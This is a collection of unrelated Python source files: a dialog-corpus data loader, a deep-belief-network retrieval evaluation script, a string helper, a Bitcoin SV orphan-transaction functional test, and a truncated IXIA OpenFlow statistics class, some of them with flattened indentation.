r"""Base class for multi-turn dialog datasets. This is an abstract class.
Arguments:
ext_vocab (list): special tokens. default: `["<pad>", "<unk>", "<go>", "<eos>", "<eot>"]`
key_name (list): name of subsets of the data. default: `["train", "dev", "test"]`
Attributes:
ext_vocab (list): special tokens, be placed at beginning of `vocab_list`.
For example: `["<pad>", "<unk>", "<go>", "<eos>", "<eot>"]`
pad_id (int): token for padding, always equal to `0`
unk_id (int): token for unkown words, always equal to `1`
go_id (int): token at the beginning of sentences, always equal to `2`
eos_id (int): token at the end of sentences, always equal to `3`
eot_id (int): token at the end of turns, always equal to `4`
key_name (list): name of subsets of the data. For example: `["train", "dev", "test"]`
vocab_list (list): vocabulary list of the datasets.
word2id (dict): a dict mapping tokens to index.
Maybe you want to use :meth:`sen_to_index` instead.
"""
def __init__(self, \
ext_vocab=None, \
key_name=None, \
):
super().__init__()
# initialize by default value. (can be overwritten by subclass)
self.ext_vocab = ext_vocab or ["<pad>", "<unk>", "<go>", "<eos>", "<eot>"]
self.pad_id = self.ext_vocab.index("<pad>")
self.unk_id = self.ext_vocab.index("<unk>")
self.go_id = self.ext_vocab.index("<go>")
self.eos_id = self.ext_vocab.index("<eos>")
self.eot_id = self.ext_vocab.index("<eot>")
self.key_name = key_name or ["train", "dev", "test"]
# initialize by subclass
self.vocab_list, self.data = self._load_data()
self.word2id = {w: i for i, w in enumerate(self.vocab_list)}
# postprocess initialization
self.index = {}
self.batch_id = {}
self.batch_size = {}
for key in self.key_name:
self.batch_id[key] = 0
self.batch_size[key] = None
self.index[key] = list(range(len(self.data[key]['session'])))
def _load_data(self):
r'''This function is called during the initialization.
Returns:
(tuple): tuple containing (refer to the following example):
vocab_list (list): vocabulary list of the datasets.
data (dict): a dict contains data.
Examples:
.. highlight:: python
.. code-block:: python
vocab_list = ["<pad>", "<unk>", "<go>", "<eos>", "<eot>", "how", \
"are", "you", "hello", "i", "am", \
"fine", "hi"]
data = {
"train": {
"session": [
[
[2, 12, 3, 5, 6, 7, 3, 4], # session_0, turn_0: <go> hi <eos> how are you <eos> <eot>
[2, 9, 10, 11, 3, 4], # session_0, turn_1: <go> i am fine <eos> <eot>
],
[
... # session_1, similar to session_0
],
...
]
},
"dev": {...}, # similar to train
"test": {...}, # similar to train
}
Notes:
You can use ``ext_vocab``, ``key_name``, ``pad_id``, ``unk_id``, ``go_id``,
``eos_id``, ``eot_id``, but other attributes are not initialized.
'''
raise NotImplementedError("This function should be implemented by subclasses.")
@property
def vocab_size(self):
'''Equals to `len(self.vocab_list)`. Read only.
'''
return len(self.vocab_list)
def restart(self, key, batch_size=None, shuffle=True):
'''Initialize mini-batches. Must call this function before :func:`get_next_batch`
or an epoch is end.
Arguments:
key (str): must be contained in `key_name`
batch_size (None or int): default (None): use last batch_size.
shuffle (bool): whether to shuffle the data. default: `True`
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
if batch_size is None and self.batch_size[key] is None:
raise ValueError("You need batch_size to intialize.")
if shuffle:
random.shuffle(self.index[key])
self.batch_id[key] = 0
if batch_size is not None:
self.batch_size[key] = batch_size
print("%s set restart, %d batches and %d left" % (key, \
len(self.index[key]) // self.batch_size[key], \
len(self.index[key]) % self.batch_size[key]))
def get_batch(self, key, index):
'''Get a batch of specified `index`.
Arguments:
key (str): must be contained in `key_name`
index (list): a list of specified index
Returns:
A dict at least contains ``session``. See the example belows.
A list contains each turn data of ``content`` and ``length`` as a dict, of which the length equals to turn.
Examples:
>>> dataloader.get_batch('train', 1)
>>>
Todo:
* fix the missing example
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
res = []
batch_size = len(index)
batch_data = [self.data[key]['session'][i] for i in index]
max_turn_length = np.max([len(session) for session in batch_data])
for turn in range(max_turn_length):
res_turn = {}
res_turn['length'] = np.array(list(map(lambda d: len(d[turn]) if len(d) > turn else 0, \
batch_data)))
res_turn['content'] = np.zeros((batch_size, np.max(res_turn['length'])), dtype=int) + \
self.pad_id
for idx, session in enumerate(batch_data):
if res_turn['length'][idx] > 1:
content = session[turn]
res_turn['content'][idx, :len(content)] = content
res.append(res_turn)
return res
def get_next_batch(self, key, ignore_left_samples=False):
'''Get next batch.
Arguments:
key (str): must be contained in `key_name`
ignore_left_samples (bool): Ignore the last batch, whose sample num
is not equal to `batch_size`. Default: `False`
Returns:
A dict like :func:`get_batch`, or None if the epoch is end.
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
if self.batch_size[key] is None:
raise RuntimeError("Please run restart before calling this function.")
batch_id = self.batch_id[key]
start, end = batch_id * self.batch_size[key], (batch_id + 1) * self.batch_size[key]
if start >= len(self.index[key]):
return None
if ignore_left_samples and end > len(self.index[key]):
return None
index = self.index[key][start:end]
res = self.get_batch(key, index)
self.batch_id[key] += 1
return res
def sen_to_index(self, sen):
'''Convert a sentences from string to index representation.
Arguments:
sen (list): a list of str, representing each token of the sentences.
Examples:
>>> dataloader.sen_to_index(
... ["<go>", "I", "have", "been", "to", "Sichuan", "province", "eos"])
>>>
Todo:
* fix the missing example
'''
return list(map(lambda word: self.word2id.get(word, self.unk_id), sen))
def trim_index(self, index):
'''Trim index. There will be two steps:
* find first `<eot>` and abondon words after it (included the `<eot>`).
* ignore `<pad>` s at the end of the sentence.
Arguments:
index (list): a list of int
Examples:
>>> dataloader.index_to_sen(
... [])
>>>
Todo:
* fix the missing example
'''
index = trim_before_target(list(index), self.eot_id)
idx = len(index)
while index[idx-1] == self.pad_id:
idx -= 1
index = index[:idx]
return index
def index_to_sen(self, index, trim=True):
'''Convert a sentences from index to string representation
Arguments:
index (list): a list of int
trim (bool): if True, call :func:`trim_index` before convertion.
Examples:
>>> dataloader.index_to_sen(
... [])
>>>
Todo:
* fix the missing example
'''
if trim:
index = self.trim_index(index)
return list(map(lambda word: self.vocab_list[word], index))
def get_teacher_forcing_metric(self, gen_prob_key="gen_prob"):
    '''Get metric for teacher-forcing mode.
    It contains:
        * :class:`.metric.PerlplexityMetric`
    Arguments:
        gen_prob_key (str): default: `gen_prob`. Refer to :class:`.metric.PerlplexityMetric`
    '''
    metric = PerlplexityMetric(self, gen_prob_key=gen_prob_key)
    return metric
def get_inference_metric(self, gen_key="gen"):
    '''Get metric for inference.
    It contains:
        * :class:`.metric.BleuCorpusMetric`
        * :class:`.metric.SingleDialogRecorder`
    Arguments:
        gen_key (str): default: "gen". Refer to :class:`.metric.BleuCorpusMetric` or
            :class:`.metric.SingleDialogRecorder`
    '''
    metric_chain = MetricChain()
    metric_chain.add_metric(BleuCorpusMetric(self, gen_key=gen_key))
    metric_chain.add_metric(SingleDialogRecorder(self, gen_key=gen_key))
    return metric_chain
class UbuntuCorpus(MultiTurnDialog):
    '''A dataloader for the Ubuntu Dialogue Corpus.
    (The original docstring said "OpenSubtitles dataset", which was wrong --
    this class reads ``ubuntu_corpus_{key}.csv`` files.)
    Arguments:
        file_path (str): a str indicates the dir of the Ubuntu dataset.
        min_vocab_times (int): A cut-off threshold of `UNK` tokens. All tokens appear
            less than `min_vocab_times` will be replaced by `<unk>`. Default: 10.
        max_sen_length (int): All sentences longer than `max_sen_length` will be shortened
            to first `max_sen_length` tokens. Default: 50.
        max_turn_length (int): All sessions longer than `max_turn_length` will be shortened
            to first `max_turn_length` sentences. Default: 20.
    Refer to :class:`.MultiTurnDialog` for attributes.
    Todo:
        * add references
    '''
    def __init__(self, file_path, min_vocab_times=10, max_sen_length=50, max_turn_length=20):
        self._file_path = file_path
        self._min_vocab_times = min_vocab_times
        self._max_sen_length = max_sen_length
        self._max_turn_length = max_turn_length
        # Base-class __init__ calls _load_data() below.
        super(UbuntuCorpus, self).__init__()

    def _load_data(self):
        r'''Loading dataset, invoked by MultiTurnDialog.__init__
        '''
        origin_data = {}
        for key in self.key_name:
            with open('%s/ubuntu_corpus_%s.csv' % (self._file_path, key)) as f:
                raw_data = list(csv.reader(f))
                head = raw_data[0]
                # Some splits carry a 'Label' column; keep only positive pairs there.
                if head[2] == 'Label':
                    raw_data = [d[0] + d[1] for d in raw_data[1:] if d[2] == '1.0']
                else:
                    raw_data = [d[0] + d[1] for d in raw_data[1:]]
                # '__eou__' marks end of utterance (mapped to <eos>), '__eot__'
                # marks end of turn; each raw string becomes a list of token
                # lists, one per turn.
                raw2line = lambda raw: [sent.strip().split() \
                    for sent in raw.strip().replace('__eou__', '<eos>').split('__eot__')]
                origin_data[key] = {'session': list(map(raw2line, raw_data))}

        # Build the vocabulary from the training set only.
        vocab = list(chain(*chain(*(origin_data['train']['session']))))
        # Important: Sort the words preventing the index changes between different runs
        vocab = sorted(Counter(vocab).most_common(), key=lambda pair: (-pair[1], pair[0]))
        left_vocab = list(filter(lambda x: x[1] >= self._min_vocab_times, vocab))
        left_vocab = list(map(lambda x: x[0], left_vocab))
        # '<eos>' was injected by the '__eou__' replacement above; remove it
        # here because ext_vocab already provides the special token.
        left_vocab.remove('<eos>')
        vocab_list = self.ext_vocab + left_vocab
        word2id = {w: i for i, w in enumerate(vocab_list)}
        print("vocab list length = %d" % len(vocab_list))

        # Map a token line to ids wrapped in <go> ... <eot>, truncated to the
        # maximum sentence length; unknown tokens become <unk>.
        line2id = lambda line: ([self.go_id] + list(map(lambda word: word2id.get(word, self.unk_id), line)) + \
            [self.eot_id])[:self._max_sen_length]

        data = {}
        for key in self.key_name:
            data[key] = {}
            data[key]['session'] = [list(map(line2id, session[:self._max_turn_length])) \
                for session in origin_data[key]['session']]
            # Statistics: OOV rate and how much the length limits truncate.
            vocab = list(chain(*chain(*(origin_data[key]['session']))))
            vocab_num = len(vocab)
            oov_num = len(list(filter(lambda word: word not in word2id, vocab)))
            sent_length = list(map(len, chain(*origin_data[key]['session'])))
            # The +2 accounts for the <go>/<eot> tokens added by line2id.
            cut_word_num = np.sum(np.maximum(np.array(sent_length) - self._max_sen_length + 2, 0))
            turn_length = list(map(len, origin_data[key]['session']))
            sent_num = np.sum(turn_length)
            cut_sent_num = np.sum(np.maximum(np.array(turn_length) - self._max_turn_length, 0))
            print(("%s set. OOV rate: %f, max sentence length before cut: %d, cut word " + \
                "rate: %f\n\tmax turn length before cut: %d, cut sentence rate: %f") % \
                (key, oov_num / vocab_num, max(sent_length), cut_word_num / vocab_num, \
                max(turn_length), cut_sent_num / sent_num))
        return vocab_list, data
|
__author__ = 'larsmaaloee'
import os
import env_paths as ep
import matplotlib
import numpy as np
from DBN.dbn import generate_output_for_test_data, generate_output_for_train_data, generate_input_data_list
from DataPreparation.data_processing import get_all_class_indices, get_all_class_names
from heapq import nsmallest
from scipy.spatial.distance import cosine, euclidean, cdist
from multiprocessing import Pool
import multiprocessing
import serialization as s
from collections import Counter
from sklearn.metrics import confusion_matrix
import pylab as plot
import time
class DBNTesting:
def __init__(self, testing=True, binary_output=False):
"""
@param testing: Should be True if test data is to be plottet. Otherwise False.
@param image_data: If the testing should be done on image data.
@param binary_output: If the output of the DBN must be binary.
"""
if not check_for_data:
print 'No DBN data or testing data.'
return
self.status = -1
self.output = []
self.testing = testing
self.binary_output = binary_output
try:
self.output_data = s.load(open('output/output_data.p', 'rb'))
self.class_indices = s.load(open('output/class_indices.p', 'rb'))
except:
self.output_data = generate_output_for_test_data(
binary_output=self.binary_output) if testing else generate_output_for_train_data(
binary_output=self.binary_output)
self.class_indices = get_all_class_indices(training=False) if testing else get_all_class_indices()
s.dump([out.tolist() for out in self.output_data], open('output/output_data.p', 'wb'))
s.dump(self.class_indices, open('output/class_indices.p', 'wb'))
self.output_data = np.array(self.output_data)
def generate_accuracy_measurement(self, evaluation_points):
"""
Generate an accuracy measurement for the current DBN. This method will run through each output of the
dataset and check whether its X neighbors are of the same category. The amount of neighbors will evalu-
ate in a percentage score. So for instance an output who has 3 neighbors where 2 are of the same cate-
gory will get the accuracy score of 2/3. All accuracy scores are averaged at the end. This algorithm will
run for an X amound of evaluation_points.
@param evaluation_points: A list containing the number of neighbors that are to be evaluated. i.e. [1,3]
means that the method should calculate the accuracy measurement for 1 and 3 neighbors.
"""
accuracies = []
for e in evaluation_points:
self.__output('Evaluation: %i'%(e))
acc = 0.0
for it in range(len(self.output_data)):
o1 = self.output_data[it]
if self.binary_output:
distances = np.array(hamming_distance(o1, self.output_data), dtype=float)
distances[it] = np.Inf
else:
distances = np.array(distance(o1, self.output_data), dtype=float)
distances[it] = np.inf
# Retrieve the indices of the n maximum values
minimum_values = nsmallest(e, distances)
indices = []
for m in minimum_values:
i = list(np.where(np.array(distances) == m)[0])
indices += i
acc_temp = 0.0
for i in indices:
if self.class_indices[i] == self.class_indices[it]:
acc_temp += 1.0
acc_temp /= len(indices)
acc += acc_temp
if it + 1 % 1000 == 0:
self.__output('Correct: %.1f%% of %i'%((acc / (it + 1)) * 100,it+1))
accuracies.append(acc / len(self.output_data))
for i in range(len(accuracies)):
self.__output('Eval[%i]: %.2f%%'%(evaluation_points[i],accuracies[i]*100))
self.__write_output_to_file()
def __write_output_to_file(self):
print 'Outputting test scores to output folder.'
f = open('output/testscores.txt', 'wb')
for i in range(len(self.output)):
s = self.output[i]
f.write(s + "\n")
f.close()
def __output(self, s):
f = open('output/testscores.txt', 'a')
f.write(s + "\n")
f.close()
print s
self.output.append(s)
def generate_accuracy_measurement_parallel(self, evaluation_points):
"""
Parallel implementation of the accuracy measurement.
Generate an accuracy measurement for the current DBN. This method will run through each output of the
dataset and check whether its X neighbors are of the same category. The amount of neighbors will evalu-
ate in a percentage score. So for instance an output who has 3 neighbors where 2 are of the same cate-
gory will get the accuracy score of 2/3. All accuracy scores are averaged at the end. This algorithm will
run for an X amound of evaluation_points.
@param evaluation_points: A list containing the number of neighbors that are to be evaluated. i.e. [1,3]
means that the method should calculate the accuracy measurement for 1 and 3 neighbors.
"""
# Split outpudata for multiprocessing purposes.
self.split_output_data = []
self.split_class_indices = []
tmp_output_data = []
tmp_class_indices = []
for i in xrange(len(self.output_data)):
if i > 0 and i % 100 == 0:
self.split_output_data.append(tmp_output_data)
self.split_class_indices.append(tmp_class_indices)
tmp_output_data = []
tmp_class_indices = []
tmp_output_data.append(self.output_data[i])
tmp_class_indices.append(self.class_indices[i])
if len(tmp_output_data) > 0:
self.split_output_data.append(tmp_output_data)
self.split_class_indices.append(tmp_class_indices)
manager = multiprocessing.Manager()
distances_dict = manager.dict()
accuracies = []
for e in evaluation_points:
self.__output('Evaluate %i nearest neighbors.'%(e))
acc = 0.0
processed = 0
for i in xrange(len(self.split_output_data)):
o = self.split_output_data[i]
# init multiprocessing
manager = multiprocessing.Manager()
result_queue = manager.Queue()
p = Pool(multiprocessing.cpu_count())
p.map_async(generate_acc_for_doc, [(distances_dict, e, processed + i, result_queue, self.output_data,
self.class_indices, self.binary_output) for i in range(len(o))])
p.close()
p.join()
for _ in range(len(o)):
acc += result_queue.get()
processed += len(o)
if processed % 1000 == 0:
self.__output('Correct: %.1f%% of %i'%((acc/processed)*100,processed))
accuracies.append(acc / len(self.output_data))
for i in range(len(accuracies)):
self.__output('Eval[%i]: %.2f%%'%(evaluation_points[i],accuracies[i]*100))
self.__write_output_to_file()
def confusion_matrix(self, no_of_neighbors):
evaluated_class_indices = self.k_nearest_neibors(no_of_neighbors)
font = {'family': 'normal',
'weight': 'bold',
'size': 16}
matplotlib.rc('font', **font)
lbls = get_all_class_names()
for i in range(len(lbls)):
if len(lbls[i]) > 12:
str = lbls[i][:10]
lbls[i] = str + "..."
cm = confusion_matrix(self.class_indices, evaluated_class_indices, sorted(set(self.class_indices)))
# Show confusion matrix
fig = plot.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(cm)
fig.colorbar(cax)
ax.set_xticklabels([''] + lbls)
plot.xticks(rotation=55)
ax.set_yticklabels([''] + lbls)
plot.yticks(rotation=55)
plot.ylabel('True label')
plot.xlabel('Predicted label')
plot.show()
def k_nearest_neibors(self, no_of_neighbors):
evaluated_class_indices = []
for it in range(len(self.output_data)):
# for it in range(5):
o1 = self.output_data[it]
if self.binary_output:
distances = np.array(hamming_distance(o1, self.output_data), dtype=float)
distances[it] = np.Inf
else:
# Compute distances between o1 and remaining outputs
distances = np.array(distance(o1, self.output_data), dtype=float)
distances[it] = np.inf
# Retrieve the indices of the n maximum values
minimum_values = nsmallest(no_of_neighbors, distances)
indices = []
for m in minimum_values:
i = list(np.where(np.array(distances) == m)[0])
indices += i
#if len(indices) > e: # TODO: Need to implement method to check for indices with same distance
# print 'Indices ',len(indices)-e,' greater than e.'
c = Counter(indices)
best_idx = -1
class_idx = -1
for i in range(len(c.keys())):
if c[c.keys()[i]] > c[best_idx]:
best_idx = c.keys()[i]
class_idx = self.class_indices[best_idx]
evaluated_class_indices.append(class_idx)
if it % 1000 == 0 and not it == 0:
print "Processed %d" % it
return evaluated_class_indices
def check_for_data():
    """
    Check for DBN network data: True when either the test data or the
    DBN weight path exists on disk.
    """
    has_data = os.path.exists(ep.get_test_data_path()) or os.path.exists(ep.get_dbn_weight_path())
    return has_data
def distance(v, m):
    """Euclidean distances from vector v to every row of matrix m."""
    row = np.array([v])  # cdist expects 2-D input
    return cdist(row, m, 'euclidean')[0]
def hamming_distance(v, m):
    """Count mismatching positions between v and each row of m."""
    mismatches = (v != m)
    return np.sum(mismatches, axis=1)
def generate_acc_for_doc(args):
    """
    Worker for the parallel accuracy measurement: score how many of one
    document's e nearest neighbors share its class, and put the fraction
    on the result queue.
    """
    distances_dict, e, idx, queue, output_data, class_indices, binary_output = args
    if idx in distances_dict:
        # Distances for this document were cached by an earlier evaluation point.
        distances = distances_dict[idx]
    else:
        o1 = output_data[idx]
        if binary_output:
            distances = np.array(hamming_distance(o1, output_data), dtype=float)
        else:
            distances = np.array(distance(o1, output_data), dtype=float)
        distances[idx] = np.inf  # never count the document as its own neighbor
        distances_dict[idx] = distances
    # Indices of the e smallest distances (ties included).
    indices = []
    for m in nsmallest(e, distances):
        indices.extend(np.where(np.array(distances) == m)[0])
    # Fraction of neighbors whose class matches the document's class.
    matches = 0.0
    for i in indices:
        if class_indices[i] == class_indices[idx]:
            matches += 1.0
    queue.put(matches / len(indices))
def LDA_DBN_comparison(lda_output_data, lda_doc_names, dbn_output_data, dbn_doc_names, evaluation_points,
binary_output=False):
dbn_output_data = np.array(dbn_output_data)
lda_output_data = np.array(lda_output_data)
# Split outpudata for multiprocessing purposes.
split_output_data = []
tmp_output_data = []
for i in xrange(len(dbn_output_data)):
if i > 0 and i % 100 == 0:
split_output_data.append(tmp_output_data)
tmp_output_data = []
tmp_output_data.append(dbn_output_data[i])
if len(tmp_output_data) > 0:
split_output_data.append(tmp_output_data)
accuracies = []
for e in evaluation_points:
print 'Evaluation: ', e
__append_output_to_file('Evaluation: ' + str(e))
acc = 0.0
processed = 0
for i in xrange(len(split_output_data)):
o = split_output_data[i]
# init multiprocessing
manager = multiprocessing.Manager()
result_queue = manager.Queue()
p = Pool()
p.map_async(generate_comparison, [(e, lda_output_data, lda_doc_names, dbn_output_data, dbn_doc_names,
processed + j, result_queue, binary_output) for j in range(len(o))])
p.close()
p.join()
for _ in range(len(o)):
acc += result_queue.get()
processed += len(o)
if processed % 1000 == 0:
s = 'Correct: ' + str((acc / (processed)) * 100)[:4] + "%" + ' of ' + str(processed)
print s
__append_output_to_file(s)
accuracies.append(acc / len(dbn_output_data))
def generate_comparison(args):
    """
    Worker for LDA_DBN_comparison: score one document's neighborhood overlap
    between DBN space and LDA space and put the fraction on the queue.
    """
    e, lda_output_data, lda_doc_names, dbn_output_data, dbn_doc_names, idx, queue, binary_output = args
    # Nearest neighbors of the document in DBN space.
    o1 = dbn_output_data[idx]
    dbn_indices = generate_proximity_indices(o1, dbn_output_data, idx, e, binary_output)
    dbn_proximity_names = []
    for i in dbn_indices:
        dbn_proximity_names.append(dbn_doc_names[i])
    # Locate the same document in the LDA set by name.
    dbn_doc_name = dbn_doc_names[idx]
    lda_idx = np.where(np.array(lda_doc_names) == dbn_doc_name)[0][0]
    o1 = lda_output_data[lda_idx]
    # BUG FIX: exclude the document's own *LDA* index (lda_idx) from its LDA
    # neighborhood; the original passed `idx` (the DBN index), so whenever the
    # two orderings differ the document turned up as its own nearest neighbor
    # and an unrelated document was excluded instead.
    lda_indices = generate_proximity_indices(o1, lda_output_data, lda_idx, e, binary_output)
    lda_proximity_names = []
    for i in lda_indices:
        lda_proximity_names.append(lda_doc_names[i])
    # Compare the docnames: fraction of DBN neighbors also found in LDA space.
    acc_temp = 0.0
    for dn in dbn_proximity_names:
        if dn in lda_proximity_names:
            acc_temp += 1.0
    if acc_temp > e:
        # Distance ties can yield more than e neighbors; cap the score at 1.0.
        acc_temp = float(e)
    acc_temp /= e
    queue.put(acc_temp)
def generate_proximity_indices(o1, output_data, idx, e, binary_output):
    """
    Return the indices of the e outputs nearest to o1 (ties included),
    excluding index idx (the document itself).
    BUG FIX: `binary_output` was accepted but ignored -- every call used the
    euclidean distance. Binary outputs now use the hamming distance, mirroring
    every other distance site in this module; the float cast keeps the
    np.inf self-exclusion assignment valid for the integer hamming result.
    """
    if binary_output:
        distances = np.array(hamming_distance(o1, output_data), dtype=float)
    else:
        # Compute distances between o1 and remaining outputs
        distances = np.array(distance(o1, output_data), dtype=float)
    distances[idx] = np.inf
    # Retrieve the indices of the e smallest values
    minimum_values = nsmallest(e, distances)
    indices = []
    for m in minimum_values:
        i = list(np.where(np.array(distances) == m)[0])
        indices += i
    return indices
def __write_output_to_file(s):
    """Overwrite the test-score file with the single line s."""
    with open('output/testscores.txt', 'wb') as f:
        f.write(s + "\n")
def __append_output_to_file(s):
    """Append the line s to the test-score file."""
    with open('output/testscores.txt', 'a') as f:
        f.write(s + "\n")
|
def trim_suffix(text, suffix):
    """Strip a suffix from text, if it appears (otherwise return text unchanged)."""
    if text.endswith(suffix):
        # Slice by computed end position so an empty suffix leaves text intact.
        return text[: len(text) - len(suffix)]
    return text
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 Bitcoin Association
# Distributed under the Open BSV software license, see the accompanying file LICENSE.
"""
Check that orphan transaction with max allowed size is accepted.
"""
from test_framework.blocktools import create_transaction, create_coinbase, create_block
from test_framework.mininode import msg_tx, msg_block
from test_framework.script import CScript, OP_TRUE
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until, assert_equal
from test_framework.cdefs import DEFAULT_MAX_TX_SIZE_POLICY_AFTER_GENESIS
import time
def make_new_block(connection):
    """Create, solve and submit a block on top of the current tip.

    Returns the block's coinbase transaction so later tests can spend it.
    (The original docstring claimed a "(tx, key) tuple" return; only the
    coinbase transaction is returned.)
    """
    tip = connection.rpc.getblock(connection.rpc.getbestblockhash())
    coinbase_tx = create_coinbase(tip["height"] + 1)
    coinbase_tx.rehash()
    block = create_block(int(tip["hash"], 16), coinbase_tx, tip["time"] + 1)
    block.solve()
    connection.send_message(msg_block(block))
    # Block until the node reports our block as the new best tip.
    wait_until(lambda: connection.rpc.getbestblockhash() == block.hash, timeout=10)
    return coinbase_tx
def make_big_orphan(tx_parent, size_bytes):
    """Build a child of tx_parent whose serialized size is exactly size_bytes.

    Iteratively grows/shrinks the zero-byte padding in the output script until
    the serialized transaction hits the target size.
    NOTE(review): assumes the adjustment converges to diff == 0; a target
    smaller than the minimal transaction would never terminate -- confirm
    callers only pass large policy-limit sizes.
    """
    add_bytes = size_bytes  # current padding length in the output script
    diff = size_bytes       # remaining gap to the target size
    while diff != 0:
        tx_child = create_transaction(tx_parent, 0, CScript(), tx_parent.vout[0].nValue - 2 * size_bytes, CScript([OP_TRUE] + [bytes(1) * add_bytes]))
        tx_child.rehash()
        diff = size_bytes - len(tx_child.serialize())
        add_bytes += diff
    return tx_child
class TestMaxSizedOrphan(BitcoinTestFramework):
    """Check that an orphan transaction of exactly the maximum policy size is
    accepted into the mempool once its parent arrives."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1

    def setup_network(self):
        self.setup_nodes()

    def setup_nodes(self):
        # Nodes are added but not started; run_test starts them with custom args.
        self.add_nodes(self.num_nodes)

    def check_mempool(self, rpc, should_be_in_mempool):
        # Wait until the mempool contains exactly the given transactions.
        wait_until(lambda: set(rpc.getrawmempool()) == {t.hash for t in should_be_in_mempool}, timeout=20)

    def run_test(self):
        with self.run_node_with_connections("Scenario 1", 0, ['-banscore=100000', '-genesisactivationheight=110', '-maxstdtxvalidationduration=100'],
                                            number_of_connections=1) as (conn,):
            coinbase1 = make_new_block(conn)
            # Mine past the genesis activation height and mature the coinbase.
            for _ in range(110):
                make_new_block(conn)
            tx_parent = create_transaction(coinbase1, 0, CScript(), coinbase1.vout[0].nValue - 1000, CScript([OP_TRUE]))
            tx_parent.rehash()
            tx_orphan = make_big_orphan(tx_parent, DEFAULT_MAX_TX_SIZE_POLICY_AFTER_GENESIS)
            assert_equal(len(tx_orphan.serialize()), DEFAULT_MAX_TX_SIZE_POLICY_AFTER_GENESIS)
            # Send the child first so the node classifies it as an orphan.
            conn.send_message(msg_tx(tx_orphan))
            # Making sure parent is not sent right away for bitcond to detect an orphan
            time.sleep(1)
            conn.send_message(msg_tx(tx_parent))
            # Both transactions must end up in the mempool.
            self.check_mempool(conn.rpc, [tx_parent, tx_orphan])
# Script entry point: run the functional test through the framework's main().
if __name__ == '__main__':
    TestMaxSizedOrphan().main()
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class OpenflowAggregatedStatistics(Base):
"""Represents stats of OpenFlow Aggregated Statistics
The OpenflowAggregatedStatistics class encapsulates a required openflowAggregatedStatistics resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = "openflowAggregatedStatistics"
_SDM_ATT_MAP = {
"ActionErrorsRx": "actionErrorsRx",
"AuxiliaryConnectionsUp": "auxiliaryConnectionsUp",
"BarrierRepliesRx": "barrierRepliesRx",
"BarrierRequestsTx": "barrierRequestsTx",
"DescriptionStatRepliesRx": "descriptionStatRepliesRx",
"DescriptionStatRequestsTx": "descriptionStatRequestsTx",
"EchoRepliesRx": "echoRepliesRx",
"EchoRepliesTx": "echoRepliesTx",
"EchoRequestsRx": "echoRequestsRx",
"EchoRequestsTx": "echoRequestsTx",
"ErrorsRx": "errorsRx",
"ExperimenterErrorsRx": "experimenterErrorsRx",
"FeatureRepliesRx": "featureRepliesRx",
"FeatureRequestsTx": "featureRequestsTx",
"FlowAddsTx": "flowAddsTx",
"FlowAggregateStatRepliesRx": "flowAggregateStatRepliesRx",
"FlowAggregateStatRequestsTx": "flowAggregateStatRequestsTx",
"FlowDelsTx": "flowDelsTx",
"FlowModErrorsRx": "flowModErrorsRx",
"FlowModsTx": "flowModsTx",
"FlowRateflowssec": "flowRateflowssec",
"FlowRemovesRx": "flowRemovesRx",
"FlowStatRepliesRx": "flowStatRepliesRx",
"FlowStatRequestsTx": "flowStatRequestsTx",
"GetAsynchronousConfigRepliesRx": "getAsynchronousConfigRepliesRx",
"GetAsynchronousConfigRequestsTx": "getAsynchronousConfigRequestsTx",
"GetConfigRepliesRx": "getConfigRepliesRx",
"GetConfigRequestsTx": "getConfigRequestsTx",
"GetQueueConfigRepliesRx": "getQueueConfigRepliesRx",
"GetQueueConfigRequestsTx": "getQueueConfigRequestsTx",
"GroupAddsTx": "groupAddsTx",
"GroupDelsTx": "groupDelsTx",
"GroupDescRepliesRx": "groupDescRepliesRx",
"GroupDescRequestsTx": "groupDescRequestsTx",
"GroupFeatureRepliesRx": "groupFeatureRepliesRx",
"GroupFeatureRequestsTx": "groupFeatureRequestsTx",
"GroupModErrorsRx": "groupModErrorsRx",
"GroupModsTx": "groupModsTx",
"GroupStatRepliesRx": "groupStatRepliesRx",
"GroupStatRequestsTx": "groupStatRequestsTx",
"HelloErrorsRx": "helloErrorsRx",
"HellosRx": "hellosRx",
"HellosTx": "hellosTx",
"InstructionErrorsRx": "instructionErrorsRx",
"MatchErrorsRx": "matchErrorsRx",
"MeterAddsTx": "meterAddsTx",
"MeterConfigRepliesRx": "meterConfigRepliesRx",
"MeterConfigRequestsTx": "meterConfigRequestsTx",
"MeterDelsTx": "meterDelsTx",
"MeterFeatureRepliesRx": "meterFeatureRepliesRx",
"MeterFeatureRequestsTx": "meterFeatureRequestsTx",
"MeterModErrorsRx": "meterModErrorsRx",
"MeterModsTx": "meterModsTx",
"MeterStatRepliesRx": "meterStatRepliesRx",
"MeterStatRequestsTx": "meterStatRequestsTx",
"OfChannelConfigured": "ofChannelConfigured",
"OfChannelConfiguredUp": "ofChannelConfiguredUp",
"OfChannelFlapCount": "ofChannelFlapCount",
"OfChannelLearnedUp": "ofChannelLearnedUp",
"PacketInsRx": "packetInsRx",
"PacketOutsTx": "packetOutsTx",
